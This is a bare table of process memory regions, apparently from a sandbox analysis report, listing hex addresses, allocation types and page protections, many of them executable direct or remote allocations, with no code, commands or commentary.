B6BD000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
240A4000
|
trusted library allocation
|
page read and write
|
||
3455000
|
trusted library allocation
|
page execute and read and write
|
||
AEA2000
|
direct allocation
|
page execute and read and write
|
||
BB7F000
|
direct allocation
|
page execute and read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
BCEB000
|
direct allocation
|
page execute and read and write
|
||
B1E7000
|
direct allocation
|
page execute and read and write
|
||
AF45000
|
direct allocation
|
page execute and read and write
|
||
BDF7000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B830000
|
direct allocation
|
page execute and read and write
|
||
B45B000
|
direct allocation
|
page execute and read and write
|
||
B6E5000
|
direct allocation
|
page execute and read and write
|
||
23CE2000
|
trusted library allocation
|
page read and write
|
||
220EC000
|
trusted library allocation
|
page read and write
|
||
AF61000
|
direct allocation
|
page execute and read and write
|
||
BEB4000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AE98000
|
direct allocation
|
page execute and read and write
|
||
7F910000
|
trusted library allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B347000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BC11000
|
direct allocation
|
page execute and read and write
|
||
B8F9000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
AF27000
|
direct allocation
|
page execute and read and write
|
||
B5E8000
|
direct allocation
|
page execute and read and write
|
||
AE8C000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
5179000
|
heap
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BCF9000
|
direct allocation
|
page execute and read and write
|
||
8820000
|
heap
|
page read and write
|
||
BD2E000
|
direct allocation
|
page execute and read and write
|
||
AD85000
|
direct allocation
|
page execute and read and write
|
||
22B6D000
|
trusted library allocation
|
page read and write
|
||
3C60000
|
remote allocation
|
page execute and read and write
|
||
BBF0000
|
direct allocation
|
page execute and read and write
|
||
27B0000
|
heap
|
page read and write
|
||
B111000
|
direct allocation
|
page execute and read and write
|
||
B139000
|
direct allocation
|
page execute and read and write
|
||
BF9E000
|
direct allocation
|
page execute and read and write
|
||
AF67000
|
direct allocation
|
page execute and read and write
|
||
6530000
|
direct allocation
|
page read and write
|
||
B36F000
|
direct allocation
|
page execute and read and write
|
||
B14C000
|
direct allocation
|
page execute and read and write
|
||
AE53000
|
direct allocation
|
page execute and read and write
|
||
64E0000
|
direct allocation
|
page read and write
|
||
B8E9000
|
direct allocation
|
page execute and read and write
|
||
BD75000
|
direct allocation
|
page execute and read and write
|
||
B86C000
|
direct allocation
|
page execute and read and write
|
||
B6E7000
|
direct allocation
|
page execute and read and write
|
||
7020000
|
direct allocation
|
page read and write
|
||
24C90000
|
trusted library allocation
|
page read and write
|
||
AF75000
|
direct allocation
|
page execute and read and write
|
||
7EF000
|
stack
|
page read and write
|
||
A814000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
ACB7000
|
direct allocation
|
page execute and read and write
|
||
B977000
|
direct allocation
|
page execute and read and write
|
||
6F80000
|
direct allocation
|
page read and write
|
||
B081000
|
direct allocation
|
page execute and read and write
|
||
B44F000
|
direct allocation
|
page execute and read and write
|
||
B152000
|
direct allocation
|
page execute and read and write
|
||
B9E5000
|
direct allocation
|
page execute and read and write
|
||
B46B000
|
direct allocation
|
page execute and read and write
|
||
BEA1000
|
direct allocation
|
page execute and read and write
|
||
8A7B000
|
heap
|
page read and write
|
||
8491000
|
heap
|
page read and write
|
||
BB25000
|
direct allocation
|
page execute and read and write
|
||
B568000
|
direct allocation
|
page execute and read and write
|
||
BD40000
|
direct allocation
|
page execute and read and write
|
||
AF94000
|
direct allocation
|
page execute and read and write
|
||
B703000
|
direct allocation
|
page execute and read and write
|
||
24DA0000
|
trusted library allocation
|
page read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B284000
|
direct allocation
|
page execute and read and write
|
||
AF89000
|
direct allocation
|
page execute and read and write
|
||
B7DC000
|
direct allocation
|
page execute and read and write
|
||
B051000
|
direct allocation
|
page execute and read and write
|
||
B26F000
|
direct allocation
|
page execute and read and write
|
||
23BC7000
|
trusted library allocation
|
page read and write
|
||
2F94000
|
trusted library allocation
|
page read and write
|
||
B502000
|
direct allocation
|
page execute and read and write
|
||
8622000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B5F2000
|
direct allocation
|
page execute and read and write
|
||
B019000
|
direct allocation
|
page execute and read and write
|
||
A585000
|
direct allocation
|
page execute and read and write
|
||
BE6F000
|
direct allocation
|
page execute and read and write
|
||
B16B000
|
direct allocation
|
page execute and read and write
|
||
23B2F000
|
trusted library allocation
|
page read and write
|
||
5300000
|
direct allocation
|
page read and write
|
||
BD0D000
|
direct allocation
|
page execute and read and write
|
||
B596000
|
direct allocation
|
page execute and read and write
|
||
4F3000
|
heap
|
page read and write
|
||
B794000
|
direct allocation
|
page execute and read and write
|
||
BA88000
|
direct allocation
|
page execute and read and write
|
||
BCF4000
|
direct allocation
|
page execute and read and write
|
||
22BAA000
|
trusted library allocation
|
page read and write
|
||
BFBF000
|
direct allocation
|
page execute and read and write
|
||
65F1000
|
heap
|
page read and write
|
||
70FD000
|
heap
|
page read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
BC83000
|
direct allocation
|
page execute and read and write
|
||
229C4000
|
trusted library allocation
|
page read and write
|
||
B3BA000
|
direct allocation
|
page execute and read and write
|
||
B806000
|
direct allocation
|
page execute and read and write
|
||
8840000
|
trusted library allocation
|
page read and write
|
||
AF1D000
|
direct allocation
|
page execute and read and write
|
||
240A0000
|
trusted library allocation
|
page read and write
|
||
6867000
|
heap
|
page read and write
|
||
2FD8000
|
heap
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
22C90000
|
trusted library allocation
|
page read and write
|
||
8450000
|
heap
|
page read and write
|
||
BDF5000
|
direct allocation
|
page execute and read and write
|
||
BDA7000
|
direct allocation
|
page execute and read and write
|
||
23C13000
|
trusted library allocation
|
page read and write
|
||
31EC000
|
stack
|
page read and write
|
||
A9D4000
|
direct allocation
|
page execute and read and write
|
||
24E6E000
|
stack
|
page read and write
|
||
AEBB000
|
direct allocation
|
page execute and read and write
|
||
321A000
|
trusted library allocation
|
page execute and read and write
|
||
B0EA000
|
direct allocation
|
page execute and read and write
|
||
B535000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24B60000
|
heap
|
page read and write
|
||
B8F5000
|
direct allocation
|
page execute and read and write
|
||
B832000
|
direct allocation
|
page execute and read and write
|
||
256C0000
|
trusted library allocation
|
page read and write
|
||
31F0000
|
trusted library section
|
page read and write
|
||
22B12000
|
trusted library allocation
|
page read and write
|
||
BDD5000
|
direct allocation
|
page execute and read and write
|
||
B84A000
|
direct allocation
|
page execute and read and write
|
||
AE1C000
|
direct allocation
|
page execute and read and write
|
||
B8B5000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
7730000
|
heap
|
page execute and read and write
|
||
B79C000
|
direct allocation
|
page execute and read and write
|
||
B140000
|
direct allocation
|
page execute and read and write
|
||
BA51000
|
direct allocation
|
page execute and read and write
|
||
B058000
|
direct allocation
|
page execute and read and write
|
||
B250000
|
direct allocation
|
page execute and read and write
|
||
70B5000
|
heap
|
page read and write
|
||
B349000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24DB0000
|
trusted library allocation
|
page read and write
|
||
AD99000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B6AE000
|
direct allocation
|
page execute and read and write
|
||
B07F000
|
direct allocation
|
page execute and read and write
|
||
B1D4000
|
direct allocation
|
page execute and read and write
|
||
B5EE000
|
direct allocation
|
page execute and read and write
|
||
B65A000
|
direct allocation
|
page execute and read and write
|
||
B7ED000
|
direct allocation
|
page execute and read and write
|
||
7EE58000
|
trusted library allocation
|
page execute and read and write
|
||
AAF6000
|
direct allocation
|
page execute and read and write
|
||
6508000
|
trusted library allocation
|
page read and write
|
||
BA8A000
|
direct allocation
|
page execute and read and write
|
||
AB41000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B3A4000
|
direct allocation
|
page execute and read and write
|
||
B506000
|
direct allocation
|
page execute and read and write
|
||
2410E000
|
stack
|
page read and write
|
||
BAEB000
|
direct allocation
|
page execute and read and write
|
||
3210000
|
trusted library allocation
|
page read and write
|
||
B701000
|
direct allocation
|
page execute and read and write
|
||
BD02000
|
direct allocation
|
page execute and read and write
|
||
B9DF000
|
direct allocation
|
page execute and read and write
|
||
B7D8000
|
direct allocation
|
page execute and read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
25050000
|
trusted library allocation
|
page read and write
|
||
ACEE000
|
direct allocation
|
page execute and read and write
|
||
AEDA000
|
direct allocation
|
page execute and read and write
|
||
AFD6000
|
direct allocation
|
page execute and read and write
|
||
B557000
|
direct allocation
|
page execute and read and write
|
||
21E3C000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
BCB7000
|
direct allocation
|
page execute and read and write
|
||
B60B000
|
direct allocation
|
page execute and read and write
|
||
87E5000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
580000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
5340000
|
direct allocation
|
page read and write
|
||
BB5F000
|
direct allocation
|
page execute and read and write
|
||
AC0F000
|
direct allocation
|
page execute and read and write
|
||
BAE9000
|
direct allocation
|
page execute and read and write
|
||
B5E2000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B11E000
|
direct allocation
|
page execute and read and write
|
||
22C93000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B0F8000
|
direct allocation
|
page execute and read and write
|
||
8CB0000
|
heap
|
page read and write
|
||
8AF0000
|
trusted library allocation
|
page read and write
|
||
AB1C000
|
direct allocation
|
page execute and read and write
|
||
B6DD000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
ADD8000
|
direct allocation
|
page execute and read and write
|
||
BC6A000
|
direct allocation
|
page execute and read and write
|
||
B5BF000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
74E5000
|
heap
|
page read and write
|
||
B334000
|
direct allocation
|
page execute and read and write
|
||
BC1A000
|
direct allocation
|
page execute and read and write
|
||
B01D000
|
direct allocation
|
page execute and read and write
|
||
BEA9000
|
direct allocation
|
page execute and read and write
|
||
22B84000
|
trusted library allocation
|
page read and write
|
||
BA01000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
A874000
|
direct allocation
|
page execute and read and write
|
||
B6AB000
|
direct allocation
|
page execute and read and write
|
||
87DE000
|
stack
|
page read and write
|
||
A7C1000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B295000
|
direct allocation
|
page execute and read and write
|
||
B4B1000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
8800000
|
trusted library allocation
|
page read and write
|
||
BEC8000
|
direct allocation
|
page execute and read and write
|
||
87F0000
|
trusted library allocation
|
page read and write
|
||
B6D4000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
8690000
|
trusted library allocation
|
page read and write
|
||
BDAB000
|
direct allocation
|
page execute and read and write
|
||
22C0C000
|
trusted library allocation
|
page read and write
|
||
22E11000
|
trusted library allocation
|
page read and write
|
||
777E000
|
stack
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BA61000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
ABEE000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B8A4000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B84C000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
2120000
|
heap
|
page read and write
|
||
65E8000
|
heap
|
page read and write
|
||
BAA0000
|
direct allocation
|
page execute and read and write
|
||
257B6000
|
trusted library allocation
|
page read and write
|
||
2430E000
|
heap
|
page read and write
|
||
B137000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
ADA6000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B01F000
|
direct allocation
|
page execute and read and write
|
||
7260000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
B230000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
direct allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B82D000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AE50000
|
direct allocation
|
page execute and read and write
|
||
87A0000
|
trusted library allocation
|
page execute and read and write
|
||
A950000
|
direct allocation
|
page execute and read and write
|
||
63F0000
|
direct allocation
|
page read and write
|
||
23BC2000
|
trusted library allocation
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BF9C000
|
direct allocation
|
page execute and read and write
|
||
B8A0000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA6B000
|
direct allocation
|
page execute and read and write
|
||
B925000
|
direct allocation
|
page execute and read and write
|
||
B109000
|
direct allocation
|
page execute and read and write
|
||
B38C000
|
direct allocation
|
page execute and read and write
|
||
ACC7000
|
direct allocation
|
page execute and read and write
|
||
B55B000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
257E2000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B9A9000
|
direct allocation
|
page execute and read and write
|
||
BE3F000
|
direct allocation
|
page execute and read and write
|
||
BCA0000
|
direct allocation
|
page execute and read and write
|
||
A756000
|
direct allocation
|
page execute and read and write
|
||
22A99000
|
trusted library allocation
|
page read and write
|
||
2FED000
|
trusted library allocation
|
page execute and read and write
|
||
434000
|
unkown
|
page read and write
|
||
B9D1000
|
direct allocation
|
page execute and read and write
|
||
ADB2000
|
direct allocation
|
page execute and read and write
|
||
BE41000
|
direct allocation
|
page execute and read and write
|
||
23F50000
|
trusted library allocation
|
page read and write
|
||
21DBC000
|
stack
|
page read and write
|
||
BD50000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BCA5000
|
direct allocation
|
page execute and read and write
|
||
A8D0000
|
direct allocation
|
page execute and read and write
|
||
B57D000
|
direct allocation
|
page execute and read and write
|
||
AF9D000
|
direct allocation
|
page execute and read and write
|
||
242B0000
|
heap
|
page read and write
|
||
BA9A000
|
direct allocation
|
page execute and read and write
|
||
BA1D000
|
direct allocation
|
page execute and read and write
|
||
6E40000
|
heap
|
page read and write
|
||
7370000
|
direct allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B9B2000
|
direct allocation
|
page execute and read and write
|
||
2FA0000
|
trusted library allocation
|
page read and write
|
||
BC28000
|
direct allocation
|
page execute and read and write
|
||
AF66000
|
direct allocation
|
page execute and read and write
|
||
AC39000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
2494E000
|
stack
|
page read and write
|
||
B225000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
6FF0000
|
direct allocation
|
page read and write
|
||
B6E0000
|
direct allocation
|
page execute and read and write
|
||
BB83000
|
direct allocation
|
page execute and read and write
|
||
2236F000
|
stack
|
page read and write
|
||
23F10000
|
trusted library allocation
|
page read and write
|
||
242E5000
|
heap
|
page read and write
|
||
65E3000
|
heap
|
page read and write
|
||
B250000
|
direct allocation
|
page execute and read and write
|
||
BBD6000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
ACC3000
|
direct allocation
|
page execute and read and write
|
||
AFAC000
|
direct allocation
|
page execute and read and write
|
||
2430E000
|
heap
|
page read and write
|
||
B248000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
A972000
|
direct allocation
|
page execute and read and write
|
||
8AD2000
|
heap
|
page read and write
|
||
AF6D000
|
direct allocation
|
page execute and read and write
|
||
B4B8000
|
direct allocation
|
page execute and read and write
|
||
239EE000
|
trusted library allocation
|
page read and write
|
||
BE97000
|
direct allocation
|
page execute and read and write
|
||
BBC8000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
B818000
|
direct allocation
|
page execute and read and write
|
||
AE48000
|
direct allocation
|
page execute and read and write
|
||
B664000
|
direct allocation
|
page execute and read and write
|
||
2A20000
|
trusted library allocation
|
page read and write
|
||
ABEA000
|
direct allocation
|
page execute and read and write
|
||
23BBD000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AF85000
|
direct allocation
|
page execute and read and write
|
||
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
6EF0000
|
direct allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
A7EC000
|
direct allocation
|
page execute and read and write
|
||
7971000
|
heap
|
page read and write
|
||
B0FB000
|
direct allocation
|
page execute and read and write
|
||
70BD000
|
heap
|
page read and write
|
||
B5EC000
|
direct allocation
|
page execute and read and write
|
||
B4AF000
|
direct allocation
|
page execute and read and write
|
||
B3AE000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
22FF0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B5EB000
|
direct allocation
|
page execute and read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
BCA7000
|
direct allocation
|
page execute and read and write
|
||
22600000
|
remote allocation
|
page read and write
|
||
B579000
|
direct allocation
|
page execute and read and write
|
||
229F5000
|
trusted library allocation
|
page read and write
|
||
21A4F000
|
stack
|
page read and write
|
||
22041000
|
trusted library allocation
|
page read and write
|
||
B479000
|
direct allocation
|
page execute and read and write
|
||
BD7A000
|
direct allocation
|
page execute and read and write
|
||
BA86000
|
direct allocation
|
page execute and read and write
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
B782000
|
direct allocation
|
page execute and read and write
|
||
B3EC000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
AD32000
|
direct allocation
|
page execute and read and write
|
||
21E94000
|
trusted library allocation
|
page read and write
|
||
627000
|
heap
|
page read and write
|
||
B2FC000
|
direct allocation
|
page execute and read and write
|
||
B461000
|
direct allocation
|
page execute and read and write
|
||
7EE40000
|
trusted library allocation
|
page execute and read and write
|
||
BA9E000
|
direct allocation
|
page execute and read and write
|
||
B17C000
|
direct allocation
|
page execute and read and write
|
||
B3C5000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B00D000
|
direct allocation
|
page execute and read and write
|
||
BAB8000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
2FC0000
|
trusted library allocation
|
page read and write
|
||
B4F7000
|
direct allocation
|
page execute and read and write
|
||
6FE0000
|
heap
|
page read and write
|
||
3295000
|
heap
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B4BB000
|
direct allocation
|
page execute and read and write
|
||
A872000
|
direct allocation
|
page execute and read and write
|
||
BC30000
|
direct allocation
|
page execute and read and write
|
||
B01B000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BC42000
|
direct allocation
|
page execute and read and write
|
||
24C8F000
|
trusted library allocation
|
page read and write
|
||
2214A000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B0C1000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B57B000
|
direct allocation
|
page execute and read and write
|
||
70A9000
|
heap
|
page read and write
|
||
3216000
|
trusted library allocation
|
page execute and read and write
|
||
B2E6000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B9AB000
|
direct allocation
|
page execute and read and write
|
||
B6B5000
|
direct allocation
|
page execute and read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
30E0000
|
trusted library allocation
|
page read and write
|
||
AE9A000
|
direct allocation
|
page execute and read and write
|
||
B51C000
|
direct allocation
|
page execute and read and write
|
||
240AA000
|
trusted library allocation
|
page read and write
|
||
B0BE000
|
direct allocation
|
page execute and read and write
|
||
AF73000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B003000
|
direct allocation
|
page execute and read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
BAAF000
|
direct allocation
|
page execute and read and write
|
||
AF7B000
|
direct allocation
|
page execute and read and write
|
||
B9F1000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
B115000
|
direct allocation
|
page execute and read and write
|
||
B828000
|
direct allocation
|
page execute and read and write
|
||
B4AA000
|
direct allocation
|
page execute and read and write
|
||
AA05000
|
direct allocation
|
page execute and read and write
|
||
B503000
|
direct allocation
|
page execute and read and write
|
||
B000000
|
direct allocation
|
page execute and read and write
|
||
BFF9000
|
direct allocation
|
page execute and read and write
|
||
B4DD000
|
direct allocation
|
page execute and read and write
|
||
B7E0000
|
direct allocation
|
page execute and read and write
|
||
B19B000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
3530000
|
heap
|
page read and write
|
||
74FF000
|
heap
|
page read and write
|
||
B840000
|
direct allocation
|
page execute and read and write
|
||
B56B000
|
direct allocation
|
page execute and read and write
|
||
B06D000
|
direct allocation
|
page execute and read and write
|
||
B299000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
AEEC000
|
direct allocation
|
page execute and read and write
|
||
BABA000
|
direct allocation
|
page execute and read and write
|
||
AFC4000
|
direct allocation
|
page execute and read and write
|
||
B69F000
|
direct allocation
|
page execute and read and write
|
||
B943000
|
direct allocation
|
page execute and read and write
|
||
22B02000
|
trusted library allocation
|
page read and write
|
||
523E000
|
stack
|
page read and write
|
||
B1BC000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B580000
|
direct allocation
|
page execute and read and write
|
||
44C0000
|
remote allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
22A19000
|
trusted library allocation
|
page read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
B419000
|
direct allocation
|
page execute and read and write
|
||
BE8E000
|
direct allocation
|
page execute and read and write
|
||
B983000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AA7F000
|
direct allocation
|
page execute and read and write
|
||
B0FA000
|
direct allocation
|
page execute and read and write
|
||
B077000
|
direct allocation
|
page execute and read and write
|
||
B135000
|
direct allocation
|
page execute and read and write
|
||
24CA0000
|
trusted library allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B0C8000
|
direct allocation
|
page execute and read and write
|
||
B838000
|
direct allocation
|
page execute and read and write
|
||
ABC0000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page execute and read and write
|
||
B326000
|
direct allocation
|
page execute and read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
2418D000
|
stack
|
page read and write
|
||
7D0B000
|
stack
|
page read and write
|
||
BCF2000
|
direct allocation
|
page execute and read and write
|
||
242E1000
|
heap
|
page read and write
|
||
BB19000
|
direct allocation
|
page execute and read and write
|
||
83DE000
|
stack
|
page read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
A9C3000
|
direct allocation
|
page execute and read and write
|
||
B592000
|
direct allocation
|
page execute and read and write
|
||
B07B000
|
direct allocation
|
page execute and read and write
|
||
AEF0000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B58D000
|
direct allocation
|
page execute and read and write
|
||
B00E000
|
direct allocation
|
page execute and read and write
|
||
5330000
|
direct allocation
|
page read and write
|
||
BAB6000
|
direct allocation
|
page execute and read and write
|
||
7549000
|
heap
|
page read and write
|
||
B011000
|
direct allocation
|
page execute and read and write
|
||
BAD6000
|
direct allocation
|
page execute and read and write
|
||
B589000
|
direct allocation
|
page execute and read and write
|
||
2300F000
|
trusted library allocation
|
page read and write
|
||
B840000
|
direct allocation
|
page execute and read and write
|
||
BA81000
|
direct allocation
|
page execute and read and write
|
||
B9ED000
|
direct allocation
|
page execute and read and write
|
||
BF98000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
3230000
|
trusted library allocation
|
page execute and read and write
|
||
BDCD000
|
direct allocation
|
page execute and read and write
|
||
B299000
|
direct allocation
|
page execute and read and write
|
||
B846000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
BE5B000
|
direct allocation
|
page execute and read and write
|
||
5B7D000
|
trusted library allocation
|
page read and write
|
||
2740000
|
heap
|
page read and write
|
||
AF14000
|
direct allocation
|
page execute and read and write
|
||
B13A000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AE1A000
|
direct allocation
|
page execute and read and write
|
||
BE07000
|
direct allocation
|
page execute and read and write
|
||
A692000
|
direct allocation
|
page execute and read and write
|
||
24DED000
|
stack
|
page read and write
|
||
BFC8000
|
direct allocation
|
page execute and read and write
|
||
B9DB000
|
direct allocation
|
page execute and read and write
|
||
CA0000
|
heap
|
page read and write
|
||
BC9E000
|
direct allocation
|
page execute and read and write
|
||
AFFF000
|
direct allocation
|
page execute and read and write
|
||
B4F1000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B1B2000
|
direct allocation
|
page execute and read and write
|
||
22BFD000
|
trusted library allocation
|
page read and write
|
||
6ED0000
|
direct allocation
|
page read and write
|
||
6FC0000
|
direct allocation
|
page read and write
|
||
BF21000
|
direct allocation
|
page execute and read and write
|
||
AF5A000
|
direct allocation
|
page execute and read and write
|
||
8912000
|
heap
|
page read and write
|
||
B622000
|
direct allocation
|
page execute and read and write
|
||
B769000
|
direct allocation
|
page execute and read and write
|
||
B3E9000
|
direct allocation
|
page execute and read and write
|
||
A7A5000
|
direct allocation
|
page execute and read and write
|
||
31AE000
|
stack
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page read and write
|
||
7BDD000
|
stack
|
page read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
B036000
|
direct allocation
|
page execute and read and write
|
||
B975000
|
direct allocation
|
page execute and read and write
|
||
AFC8000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
A792000
|
direct allocation
|
page execute and read and write
|
||
AFE1000
|
direct allocation
|
page execute and read and write
|
||
B55D000
|
direct allocation
|
page execute and read and write
|
||
25810000
|
trusted library allocation
|
page read and write
|
||
B495000
|
direct allocation
|
page execute and read and write
|
||
657A000
|
heap
|
page read and write
|
||
AFF8000
|
direct allocation
|
page execute and read and write
|
||
22B89000
|
trusted library allocation
|
page read and write
|
||
7480000
|
heap
|
page read and write
|
||
2400000
|
heap
|
page read and write
|
||
